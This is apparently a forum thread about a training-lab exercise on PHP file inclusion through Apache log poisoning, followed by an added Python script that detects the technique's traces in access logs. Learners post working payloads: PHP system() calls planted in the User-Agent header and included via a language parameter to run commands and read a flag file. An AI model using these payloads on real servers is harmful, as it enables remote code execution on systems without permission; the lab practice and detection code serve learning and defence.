FILE INCLUSION - Log Poisoning

Good afternoon guys.
Help me please.
I can’t complete this task.
I do everything as described in the task using http://<SERVER_IP>:/index.php?language=/var/log/apache2/access.log
Next I do curl -s "http://<SERVER_IP>:/index.php" -A '<?php system($_GET["cmd"]); ?>'
But the fact is that even using Burp Suite and doing everything according to the instructions, I can’t read the flag.
I see it. But none of the commands via &cmd=id work.
I did so.

  1. Command: curl -i -v {URL} -A "<?php system('ls /'); ?>"
    Then took cookies
  2. curl -i -v {URL} -b "PHPSESSID=ldb02hufk7p8s0o624hrnjv335"
    Then I launched Burp Suite and added GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1
    But I am not getting the command executed.
    If I change &cmd=pwd I get a 500 server error.
    Please tell me what I’m doing wrong.

I see the flag but can’t read it using cmd=cat%20

none of the commands are executed, except for some

I don’t know about this, but this module used to freeze a lot when I tried log poisoning via Burp. I used another method to get this flag because either Burp or the server gave up on me several times.

1 Like

Thanks a lot for your answer.
I’m assuming the server is lagging!
This is nonsense, a task that takes 5 minutes takes me 3 days.
Thank you. I’ll try another hack method.
If you have any other ideas, I would be grateful for the hint.

@XANTAN I had quite a problem with " there - apache access.log is somehow tricky with these and it was the cause for me. I made a custom python exploit which does this attack automatically without burp.

payload in python could look e.g. like this '''<?php system('cat xy.txt'); ?>''' … I advise using a more elaborate approach e.g. using ‘find’ and properly escaping all shiny characters

1 Like

Guys, thank you very much for your help.
I figured it out on my own.
How I solved the problem.
I decided to leave this task and move on to the next one, in order to free my thoughts from the accumulated information.
As a result, while I was solving the following problem, I noticed that with the command
curl -i -v {URL} -A "<?php system('ls /'); ?>"
I see a list of directories and files in the main directory with (‘ls /’)
Then I started thinking, why don’t I use burp suite and use curl and with the help of this template that I wrote above, send pwd, because the task is to execute the pwd command.
And lo and behold, I succeeded, only visible due to server lag, I had to execute each command 2 times!
After that I did
curl -i -v http://178.128.173.79:31341 -A "<?php system('cat /MyFlag.txt'); ?>"
again, 2 times and lo and behold, I saw the flag on the site itself, after refreshing the page, and I also saw it in burp suite!

I’m stuck on the final assessment. I have found the access.log file but can’t poison it: when I enter anything in user_agent it doesn’t appear in the logs. Help please.

Good afternoon.
I would like to draw your attention to:

  1. Pwnbox often doesn’t work well if you use it!
  2. If you use your Kali machine, then there may be problems with VPN.

Now for the task.
I ran the browser page at http://<SERVER_IP>:/index.php?language=/var/log/apache2/access.log
At the same time, Burp Suite was launched in parallel, in order to see what is happening on the server.
Then I ran the command I wrote above.
curl -i -v {Your server IP:Port} -A "<?php system('ls /'); ?>"
After that we refresh the page
http://<SERVER_IP>:/index.php?language=/var/log/apache2/access.log
and see what it says!
You should see flag.txt and all directories on the server, because curl sent (‘ls /’) to the main directory.
In parallel, you can see what is happening in Burp Suite.
If it worked, you can run all Linux commands.
Change the command (‘ls /’) to the one you need and after each sending of the curl, refresh the page with access.log and see if the command was executed or not!
Good luck.
3 Likes

thanks

Hello,

User-Agent: Mozilla/5.0 <?php system($_GET['cmd']); ?> Gecko/20100101 Firefox/102.0

When I did it like this it fixed it for me.
I continued the other steps from the articles on HTB.

Edit log in Burp Suite and send again

GET /index.php?language=/var/log/apache2/access.log HTTP/1.1
Host: ip:port
User-Agent: <?php system('cat /namefile.txt'); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=Cookie’your
Upgrade-Insecure-Requests: 1
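
Added example, not part of the thread or the course material: a log-review sketch for defenders that flags the two traces this technique leaves in an Apache combined-format access log, a PHP open tag stored in a logged field and a request parameter that names a log file. The sample lines, the function names and the path patterns are constructed for illustration; the parser allows for the backslash-escaped double quotes that Apache writes, which is the quoting problem mentioned in the thread.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format. Quoted fields may hold backslash-escaped quotes,
# because Apache writes a double quote inside a logged header as \".
Q = r'"((?:[^"\\]|\\.)*)"'
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + Q + r' (\d{3}) \S+ ' + Q + ' ' + Q + '$')
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)
# Assumed patterns for "value points at a log file"; extend for your layout.
LOG_PATH = re.compile(r'(?:^|/)(?:access|error)[._]log\b|/var/log/|/proc/self/', re.I)

def inspect(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = LINE.match(line.strip())
    if not m:
        return ["unparseable"]
    _ip, _ts, request, _status, referer, agent = m.groups()
    findings = []
    # Trace 1: PHP code stored in a client-controlled field of the log.
    for name, value in (("request", request), ("referer", referer), ("user-agent", agent)):
        if PHP_TAG.search(value):
            findings.append("php-tag-in-" + name)
    # Trace 2: a query parameter whose value names a log file (the include step).
    parts = request.split(" ")
    if len(parts) >= 2:
        for key, value in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
            if LOG_PATH.search(value):
                findings.append("log-path-in-param:" + key)
    return findings

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: f for n, f in enumerate(map(inspect, lines), 1) if f}

# Constructed sample lines (documentation-range IP, not from a real server).
SAMPLE = [
    r'203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/102.0"',
    r'203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php system($_GET[\"cmd\"]); ?>"',
    r'203.0.113.7 - - [10/Oct/2023:13:56:09 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 500 0 "-" "curl/7.88.1"',
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE).items():
        print(n, ", ".join(f))
```

Either finding alone is worth a look; both from the same client within a short window is the pattern the thread describes.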